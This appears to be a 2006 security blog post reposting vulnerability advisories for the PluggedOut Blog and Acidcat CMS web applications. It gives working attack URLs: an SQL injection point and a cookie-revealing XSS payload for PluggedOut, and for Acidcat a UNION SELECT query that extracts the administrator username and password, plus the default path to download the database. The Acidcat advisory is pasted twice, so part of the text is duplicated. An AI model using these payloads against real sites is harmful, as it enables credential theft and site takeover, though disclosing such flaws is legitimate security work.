Monday, July 10, 2006
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application.Rather than
give you a thousand things you don't really want ...
PluggedOut Blog : http://www.pluggedout.com/
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)
example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]
and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
Acidcat ASP CMS Multiple Vulnerabilities
Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";
Exploit:
The following URL will illustrate how you can easily find administrator username and password by entering the following URL:
http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp
Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";
Exploit:
The following URL will illustrate how you can easily find administrator username and password by entering the following URL:
http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp
Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb